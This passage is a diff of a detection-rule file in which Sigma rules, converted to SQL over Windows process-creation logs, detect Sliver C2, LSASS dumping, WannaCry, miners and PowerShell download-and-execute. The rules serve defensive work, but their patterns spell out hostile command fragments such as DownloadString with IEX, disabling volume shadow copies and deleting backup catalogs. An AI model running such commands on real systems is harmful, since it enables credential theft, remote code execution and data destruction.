'%AHIAZQBhAHQAZQBSAGUAbQBvAHQAZQBUAGgAcgBlAGEAZA%' ESCAPE '\\' OR CommandLine LIKE '%cmVhdGVSZW1vdGVUaHJlYW%' ESCAPE '\\' OR CommandLine LIKE '%MAcgBlAGEAdABlAFIAZQBtAG8AdABlAFQAaAByAGUAYQBkA%' ESCAPE '\\' OR CommandLine LIKE '%NyZWF0ZVJlbW90ZVRocmVhZ%' ESCAPE '\\' OR CommandLine LIKE '%Q3JlYXRlUmVtb3RlVGhyZWFk%' ESCAPE '\\' OR CommandLine LIKE '%QwByAGUAYQB0AGUAUgBlAG0AbwB0AGUAVABoAHIAZQBhAGQA%' ESCAPE '\\' OR CommandLine LIKE '%0AZQBtAG0AbwB2AGUA%' ESCAPE '\\' OR CommandLine LIKE '%1lbW1vdm%' ESCAPE '\\' OR CommandLine LIKE '%AGUAbQBtAG8AdgBlA%' ESCAPE '\\' OR CommandLine LIKE '%bQBlAG0AbQBvAHYAZQ%' ESCAPE '\\' OR CommandLine LIKE '%bWVtbW92Z%' ESCAPE '\\' OR CommandLine LIKE '%ZW1tb3Zl%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '%\\\\Services\\\\VSS\\\\Diag%' ESCAPE '\\' AND CommandLine LIKE '%/d Disabled%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_hidden_b64_cmd.yml" + "filename": "proc_creation_win_reg_volsnap_disable.yml" }, { - "title": "Potential Credential Dumping Attempt Using New NetworkProvider - CLI", - "id": "baef1ec6-2ca9-47a3-97cc-4cf2bda10b77", + "title": "HackTool - Sliver C2 Implant Activity Pattern", + "id": "42333b2c-b425-441c-b70e-99404a17170f", "status": "experimental", - "description": "Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects process activity patterns as seen being used by Sliver C2 framework implants", + "author": "Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Other legitimate network providers used and not filtred in this rule" + "Unlikely" 
], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\NetworkProvider%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%-NoExit -Command [Console]::OutputEncoding=[Text.UTF8Encoding]::UTF8%' ESCAPE '\\')" ], - "filename": "proc_creation_win_registry_new_network_provider.yml" + "filename": "proc_creation_win_hktl_sliver_c2_execution_pattern.yml" }, { - "title": "Suspicious File Download Using Office Application", - "id": "0c79148b-118e-472b-bdb7-9b57b444cc19", + "title": "HackTool - ADCSPwn Execution", + "id": "cd8c163e-a19b-402e-bdd5-419ff5859f12", "status": "test", - "description": "Detects the usage of one of three Microsoft office applications (Word, Excel, PowerPoint) to download arbitrary files", - "author": "Beyu Denis, oscd.community", + "description": "Detects command line parameters used by ADCSPwn, a tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.credential_access", + "attack.t1557.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\') AND CommandLine LIKE '%http%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% --adcs %' ESCAPE '\\' AND CommandLine LIKE '% --port %' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_office.yml" + "filename": "proc_creation_win_hktl_adcspwn.yml" 
}, { - "title": "HackTool - UACMe Akagi Execution", - "id": "d38d2fa4-98e6-4a24-aff1-410b0c9ad177", + "title": "PowerShell Web Download and Execution", + "id": "85b0b087-eddf-4a2b-b033-d771fa2b9775", "status": "experimental", - "description": "Detects the execution of UACMe, a tool used for UAC bypasses, via default PE metadata", - "author": "Christian Burkard (Nextron Systems), Florian Roth (Nextron Systems)", + "description": "Detects suspicious ways to download files or content and execute them using PowerShell Invoke-Expression", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Unknown" + "Scripts or tools that download files and execute them" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Product = 'UACMe' OR Company IN ('REvol Corp', 'APT 92', 'UG North', 'Hazardous Environments', 'CD Project Rekt') OR Description IN ('UACMe main module', 'Pentesting utility') OR OriginalFileName IN ('Akagi.exe', 'Akagi64.exe') OR (NewProcessName LIKE '%\\\\Akagi64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Akagi.exe' ESCAPE '\\') OR (Hashes LIKE '%IMPHASH=767637C23BB42CD5D7397CF58B0BE688%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=14C4E4C72BA075E9069EE67F39188AD8%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=7D010C6BB6A3726F327F7E239166D127%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=89159BA4DD04E4CE5559F132A9964EB3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5834ED4291BDEB928270428EBBAF7604%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74%' ESCAPE '\\' OR Hashes LIKE 
'%IMPHASH=3DE09703C8E79ED2CA3F01074719906B%' ESCAPE '\\') OR Imphash IN ('767637c23bb42cd5d7397cf58b0be688', '14c4e4c72ba075e9069ee67f39188ad8', '3c782813d4afce07bbfc5a9772acdbdc', '7d010c6bb6a3726f327f7e239166d127', '89159ba4dd04e4ce5559f132a9964eb3', '6f33f4a5fc42b8cec7314947bd13f30f', '5834ed4291bdeb928270428ebbaf7604', '5a8a8a43f25485e7ee1b201edcbc7a38', 'dc7d30b90b2d8abf664fbed2b1b59894', '41923ea1f824fe63ea5beb84db7a3e74', '3de09703c8e79ed2ca3f01074719906b')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%.DownloadString(%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadFile(%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WebRequest %' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\') AND (CommandLine LIKE '%IEX(%' ESCAPE '\\' OR CommandLine LIKE '%IEX (%' ESCAPE '\\' OR CommandLine LIKE '%I`EX%' ESCAPE '\\' OR CommandLine LIKE '%IE`X%' ESCAPE '\\' OR CommandLine LIKE '%I`E`X%' ESCAPE '\\' OR CommandLine LIKE '%| IEX%' ESCAPE '\\' OR CommandLine LIKE '%|IEX %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Expression%' ESCAPE '\\' OR CommandLine LIKE '%;iex $%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_uacme.yml" + "filename": "proc_creation_win_powershell_download_iex.yml" }, { - "title": "WannaCry Ransomware Activity", - "id": "41d40bff-377a-43e2-8e1b-2e543069e079", - "status": "test", - "description": "Detects WannaCry ransomware activity", - "author": "Florian Roth (Nextron Systems), Tom U. 
@c_APT_ure (collection), oscd.community, Jonhnathan Ribeiro", + "title": "ImagingDevices Unusual Parent/Child Processes", + "id": "f11f2808-adb4-46c0-802a-8660db50fa99", + "status": "experimental", + "description": "Detects unusual parent or children of the ImagingDevices.exe (Windows Contacts) process as seen being used with Bumblebee activity", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1210", - "attack.discovery", - "attack.t1083", "attack.defense_evasion", - "attack.t1222.001", - "attack.impact", - "attack.t1486", - "attack.t1490" + "attack.execution" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\tasksche.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mssecsvc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskdl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskhsvc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskse.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\111.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\lhdfrgui.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\linuxnew.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wannacry.exe' ESCAPE '\\') OR NewProcessName LIKE '%WanaDecryptor%' ESCAPE '\\' OR (CommandLine LIKE '%icacls%' ESCAPE '\\' AND CommandLine LIKE '%/grant%' ESCAPE '\\' AND CommandLine LIKE '%Everyone:F%' ESCAPE '\\' AND CommandLine LIKE '%/T%' ESCAPE '\\' AND CommandLine LIKE '%/C%' ESCAPE '\\' AND CommandLine LIKE '%/Q%' ESCAPE '\\') OR (CommandLine LIKE '%bcdedit%' ESCAPE '\\' AND CommandLine LIKE '%/set%' ESCAPE '\\' AND CommandLine LIKE '%{default}%' ESCAPE '\\' AND CommandLine LIKE '%recoveryenabled%' ESCAPE '\\' AND CommandLine LIKE '%no%' ESCAPE '\\') OR (CommandLine LIKE '%wbadmin%' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%catalog%' ESCAPE '\\' AND CommandLine LIKE '%-quiet%' ESCAPE '\\') OR 
CommandLine LIKE '%@Please\\_Read\\_Me@.txt%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((ParentProcessName LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND NewProcessName LIKE '%\\\\ImagingDevices.exe' ESCAPE '\\') OR ParentProcessName LIKE '%\\\\ImagingDevices.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_wannacry.yml" + "filename": "proc_creation_win_imagingdevices_unusual_parents.yml" }, { - "title": "Potential Manage-bde.wsf Abuse To Proxy Execution", - "id": "c363385c-f75d-4753-a108-c1a8e28bdbda", - "status": "test", - "description": "Detects potential abuse of the \"manage-bde.wsf\" script as a LOLBIN to proxy execution", - "author": "oscd.community, Natalia Shornikova, Nasreddine Bencherchali (Nextron Systems)", + "title": "HackTool - SecurityXploded Execution", + "id": "7679d464-4f74-45e2-9e01-ac66c5eb041a", + "status": "stable", + "description": "Detects the execution of SecurityXploded Tools", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1216" + "attack.credential_access", + "attack.t1555" ], "falsepositives": [ "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR OriginalFileName = 'wscript.exe') AND CommandLine LIKE '%manage-bde.wsf%' ESCAPE '\\') OR (((ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') AND ParentCommandLine LIKE '%manage-bde.wsf%' ESCAPE '\\') AND NOT (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Company = 'SecurityXploded' OR NewProcessName LIKE '%PasswordDump.exe' ESCAPE '\\' OR OriginalFileName LIKE '%PasswordDump.exe' 
ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_manage_bde.yml" + "filename": "proc_creation_win_hktl_secutyxploded.yml" }, { - "title": "Potential MSTSC Shadowing Activity", - "id": "6ba5a05f-b095-4f0a-8654-b825f4f16334", - "status": "test", - "description": "Detects RDP session hijacking by using MSTSC shadowing", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Modification Of Scheduled Tasks", + "id": "1c0e41cd-21bb-4433-9acc-4a2cd6367b9b", + "status": "experimental", + "description": "Detects when an attacker tries to modify an already existing scheduled tasks to run from a suspicious location\nAttackers can create a simple looking task in order to avoid detection on creation as it's often the most focused on\nInstead they modify the task after creation to include their malicious payload\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1563.002" + "attack.execution", + "attack.t1053.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%noconsentprompt%' ESCAPE '\\' AND CommandLine LIKE '%shadow:%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /Change %' ESCAPE '\\' AND CommandLine LIKE '% /TN %' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WINDOWS\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\' OR CommandLine LIKE 
'%\\%ProgramData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%appdata\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%comspec\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%localappdata\\%%' ESCAPE '\\') AND (CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%bitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%bash.exe%' ESCAPE '\\' OR CommandLine LIKE '%bash %' ESCAPE '\\' OR CommandLine LIKE '%scrcons%' ESCAPE '\\' OR CommandLine LIKE '%wmic %' ESCAPE '\\' OR CommandLine LIKE '%wmic.exe%' ESCAPE '\\' OR CommandLine LIKE '%forfiles%' ESCAPE '\\' OR CommandLine LIKE '%scriptrunner%' ESCAPE '\\' OR CommandLine LIKE '%hh.exe%' ESCAPE '\\' OR CommandLine LIKE '%hh %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_mstsc_rdp_hijack_shadowing.yml" + "filename": "proc_creation_win_schtasks_change.yml" }, { - "title": "HackTool - SharpUp PrivEsc Tool Execution", - "id": "c484e533-ee16-4a93-b6ac-f0ea4868b2f1", - "status": "experimental", - "description": "Detects the use of SharpUp, a tool for local privilege escalation", - "author": "Florian Roth (Nextron Systems)", + "title": "Non-privileged Usage of Reg or Powershell", + "id": "8f02c935-effe-45b3-8fc9-ef8696a9e41d", + "status": "test", + "description": "Search for usage of reg or Powershell by non-privileged users to modify service configuration in registry", + "author": "Teymur Kheirkhabarov (idea), Ryan Plas (rule), oscd.community", "tags": [ - "attack.privilege_escalation", - 
"attack.t1615", - "attack.t1569.002", - "attack.t1574.005" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SharpUp.exe' ESCAPE '\\' OR Description = 'SharpUp' OR (CommandLine LIKE '%HijackablePaths%' ESCAPE '\\' OR CommandLine LIKE '%UnquotedServicePath%' ESCAPE '\\' OR CommandLine LIKE '%ProcessDLLHijack%' ESCAPE '\\' OR CommandLine LIKE '%ModifiableServiceBinaries%' ESCAPE '\\' OR CommandLine LIKE '%ModifiableScheduledTask%' ESCAPE '\\' OR CommandLine LIKE '%DomainGPPPassword%' ESCAPE '\\' OR CommandLine LIKE '%CachedGPPPassword%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%reg %' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\') OR (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%set-itemproperty%' ESCAPE '\\' OR CommandLine LIKE '% sp %' ESCAPE '\\' OR CommandLine LIKE '%new-itemproperty%' ESCAPE '\\')) AND (IntegrityLevel = 'Medium' AND CommandLine LIKE '%ControlSet%' ESCAPE '\\' AND CommandLine LIKE '%Services%' ESCAPE '\\' AND (CommandLine LIKE '%ImagePath%' ESCAPE '\\' OR CommandLine LIKE '%FailureCommand%' ESCAPE '\\' OR CommandLine LIKE '%ServiceDLL%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_sharpup.yml" + "filename": "proc_creation_win_susp_non_priv_reg_or_ps.yml" }, { - "title": "DarkSide Ransomware Pattern", - "id": "965fff6c-1d7e-4e25-91fd-cdccd75f7d2c", + "title": "Suspicious Outlook Child Process", + "id": "208748f7-881d-47ac-a29c-07ea84bf691d", "status": "test", - "description": "Detects DarkSide Ransomware and helpers", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects a suspicious process spawning from an Outlook process.", + "author": "Michael Haag, Florian Roth (Nextron Systems), Markus Neis, Elastic, FPT.EagleEye Team", "tags": [ 
"attack.execution", - "attack.t1204" + "attack.t1204.002" ], "falsepositives": [ - "Unknown", - "UAC bypass method used by other malware" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%=[char][byte](''0x''+%' ESCAPE '\\' OR CommandLine LIKE '% -work worker0 -path %' ESCAPE '\\') OR (ParentCommandLine LIKE '%DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\OUTLOOK.EXE' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_darkside_ransomware.yml" + "filename": "proc_creation_win_office_outlook_susp_child_processes.yml" }, { - "title": "Time 
Travel Debugging Utility Usage", - "id": "0b4ae027-2a2d-4b93-8c7e-962caaba5b2a", + "title": "Winnti Malware HK University Campaign", + "id": "3121461b-5aa0-4a41-b910-66d25524edbb", "status": "test", - "description": "Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.", - "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", + "description": "Detects specific process characteristics of Winnti malware noticed in Dec/Jan 2020 in a campaign against Honk Kong universities", + "author": "Florian Roth (Nextron Systems), Markus Neis", "tags": [ "attack.defense_evasion", - "attack.credential_access", - "attack.t1218", - "attack.t1003.001" + "attack.t1574.002", + "attack.g0044" ], "falsepositives": [ - "Legitimate usage by software developers/testers" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\tttracer.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((ParentProcessName LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\hpqhvind.exe%' ESCAPE '\\') AND NewProcessName LIKE 'C:\\\\ProgramData\\\\DRM%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\ProgramData\\\\DRM%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\wmplayer.exe' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\Test.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\wmplayer.exe' ESCAPE '\\') OR NewProcessName LIKE 'C:\\\\ProgramData\\\\DRM\\\\CLR\\\\CLR.exe' ESCAPE '\\' OR (ParentProcessName LIKE 'C:\\\\ProgramData\\\\DRM\\\\Windows%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\SearchFilterHost.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_tttracer_mod_load.yml" + "filename": "proc_creation_win_apt_winnti_mal_hk_jan20.yml" }, { - "title": "LSASS Memory Dumping", - "id": "ffa6861c-4461-4f59-8a41-578c39f3f23e", - 
"status": "test", - "description": "Detect creation of dump files containing the memory space of lsass.exe, which contains sensitive credentials.\nIdentifies usage of Sysinternals procdump.exe to export the memory space of lsass.exe which contains sensitive credentials.\n", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community", + "title": "PUA - CsExec Execution", + "id": "d08a2711-ee8b-4323-bdec-b7d85e892b31", + "status": "experimental", + "description": "Detects the use of the lesser known remote execution tool named CsExec a PsExec alternative", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.resource_development", + "attack.t1587.001", + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%lsass%' ESCAPE '\\' AND CommandLine LIKE '%.dmp%' ESCAPE '\\') AND NOT (NewProcessName LIKE '%\\\\werfault.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\csexec.exe' ESCAPE '\\' OR Description = 'csexec'))" ], - "filename": "proc_creation_win_susp_lsass_dump.yml" + "filename": "proc_creation_win_pua_csexec.yml" }, { - "title": "Exploit for CVE-2015-1641", - "id": "7993792c-5ce2-4475-a3db-a3a5539827ef", + "title": "Potential Crypto Mining Activity", + "id": "66c3b204-9f88-4d0a-a7f7-8a57d521ca55", "status": "stable", - "description": "Detects Winword starting uncommon sub process MicroScMgmt.exe as used in exploits for CVE-2015-1641", + "description": "Detects command line parameters or strings often used by crypto miners", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036.005" + "attack.impact", + "attack.t1496" ], "falsepositives": [ - "Unknown" + "Legitimate use of crypto miners", + 
"Some build frameworks" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' AND NewProcessName LIKE '%\\\\MicroScMgmt.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '% --cpu-priority=%' ESCAPE '\\' OR CommandLine LIKE '%--donate-level=0%' ESCAPE '\\' OR CommandLine LIKE '% -o pool.%' ESCAPE '\\' OR CommandLine LIKE '% --nicehash%' ESCAPE '\\' OR CommandLine LIKE '% --algo=rx/0 %' ESCAPE '\\' OR CommandLine LIKE '%stratum+tcp://%' ESCAPE '\\' OR CommandLine LIKE '%stratum+udp://%' ESCAPE '\\' OR CommandLine LIKE '%LS1kb25hdGUtbGV2ZWw9%' ESCAPE '\\' OR CommandLine LIKE '%0tZG9uYXRlLWxldmVsP%' ESCAPE '\\' OR CommandLine LIKE '%tLWRvbmF0ZS1sZXZlbD%' ESCAPE '\\' OR CommandLine LIKE '%c3RyYXR1bSt0Y3A6Ly%' ESCAPE '\\' OR CommandLine LIKE '%N0cmF0dW0rdGNwOi8v%' ESCAPE '\\' OR CommandLine LIKE '%zdHJhdHVtK3RjcDovL%' ESCAPE '\\' OR CommandLine LIKE '%c3RyYXR1bSt1ZHA6Ly%' ESCAPE '\\' OR CommandLine LIKE '%N0cmF0dW0rdWRwOi8v%' ESCAPE '\\' OR CommandLine LIKE '%zdHJhdHVtK3VkcDovL%' ESCAPE '\\') AND NOT ((CommandLine LIKE '% pool.c %' ESCAPE '\\' OR CommandLine LIKE '% pool.o %' ESCAPE '\\' OR CommandLine LIKE '%gcc -%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_exploit_cve_2015_1641.yml" + "filename": "proc_creation_win_susp_crypto_mining_monero.yml" }, { - "title": "Renamed BrowserCore.EXE Execution", - "id": "8a4519e8-e64a-40b6-ae85-ba8ad2177559", - "status": "experimental", - "description": "Detects process creation with a renamed BrowserCore.exe (used to extract Azure tokens)", - "author": "Max Altgelt (Nextron Systems)", + "title": "Exploit for CVE-2017-8759", + "id": "fdd84c68-a1f6-47c9-9477-920584f94905", + "status": "test", + "description": "Detects Winword starting uncommon sub process csc.exe as used in exploits for CVE-2017-8759", + "author": "Florian Roth 
(Nextron Systems)", "tags": [ - "attack.t1528", - "attack.t1036.003" + "attack.execution", + "attack.t1203", + "attack.t1204.002", + "attack.initial_access", + "attack.t1566.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'BrowserCore.exe' AND NOT ((NewProcessName LIKE '%\\\\BrowserCore.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' AND NewProcessName LIKE '%\\\\csc.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_renamed_browsercore.yml" + "filename": "proc_creation_win_exploit_cve_2017_8759.yml" }, { - "title": "Manage Engine Java Suspicious Sub Process", - "id": "cea2b7ea-792b-405f-95a1-b903ea06458f", - "status": "experimental", - "description": "Detects suspicious sub processes started by the Manage Engine ServiceDesk Plus Java web service process", - "author": "Florian Roth (Nextron Systems)", + "title": "Interactive AT Job", + "id": "60fc936d-2eb0-4543-8a13-911c750a1dfc", + "status": "test", + "description": "Detects an interactive AT job, which may be used as a form of privilege escalation.", + "author": "E.M. 
